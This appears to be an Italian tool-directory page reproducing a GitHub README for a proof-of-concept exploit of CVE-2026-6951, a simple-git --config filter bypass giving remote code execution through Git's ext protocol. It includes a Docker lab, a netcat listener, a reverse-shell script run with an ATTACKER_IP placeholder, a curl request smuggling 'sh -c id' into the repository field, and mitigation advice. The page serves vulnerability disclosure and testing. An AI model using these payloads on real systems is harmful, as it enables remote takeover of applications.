Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-6951 — Proof-of-concept exploit per CVE-2026-6951, un bypass del filtro `--config` di simple-git che consente l'RCE tramite il protocollo Git ext, con un laboratorio Docker e un payload reverse shell. | Kitploit
Strumenti/GitHubGitHub/eqstlab/cve-2026-6951
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

Proof-of-concept exploit per CVE-2026-6951, un bypass del filtro `--config` di simple-git che consente l'RCE tramite il protocollo Git ext, con un laboratorio Docker e un payload reverse shell.

Vedi Repository
111 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-6951 simple-git Remote Code Execution

★ CVE-2026-6951 simple-git --config Option Filter Bypass RCE PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


Panoramica

CVE-2026-6951 è una vulnerabilità di esecuzione di codice in remoto in simple-git causata da una correzione incompleta per CVE-2022-25912. Sebbene l'opzione -c sia stata bloccata, l'opzione equivalente --config non è stata adeguatamente limitata. Un attaccante in grado di controllare gli argomenti di Git può abilitare il protocollo ext ed eseguire comandi arbitrari tramite un URL di repository ext::.


Versioni interessate

CategoriaVersione
Vulnerabileversioni di simple-git precedenti alla 3.36.0
Correttasimple-git 3.36.0 o successiva

Questo ambiente utilizza simple-git 3.35.2 e @simple-git/argv-parser 1.0.3.


Impatto

  • Esecuzione di codice in remoto con i privilegi dell'applicazione Node.js
  • Divulgazione di file sensibili
  • Accesso tramite reverse shell
  • Modifica o cancellazione dei dati dell'applicazione

Ambiente

Compila ed esegui l'ambiente vulnerabile.

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

Accedi al servizio all'indirizzo:

http://127.0.0.1:9107

Verifica lo stato del servizio.

curl -s http://127.0.0.1:9107/api/health

Il repository di esempio integrato è disponibile all'indirizzo:

file:///srv/git/sample.git

PoC

Avvia un listener sul sistema dell'attaccante.

nc -lvnp 4444

Esegui lo script di exploit.

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

La seguente richiesta esegue il comando id sfruttando l'opzione --config non limitata e il protocollo ext di Git.

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

Mitigazione

  • Aggiorna simple-git alla versione 3.36.0 o successiva.
  • Non passare opzioni Git controllate dall'utente direttamente a simple-git.
  • Consenti solo schemi di URL di repository attendibili e rifiuta gli URL ext::.
  • Applica una rigorosa validazione tramite allowlist agli URL dei repository e agli argomenti Git.

Analisi

  • KR:
  • EN:
Scarica lo strumento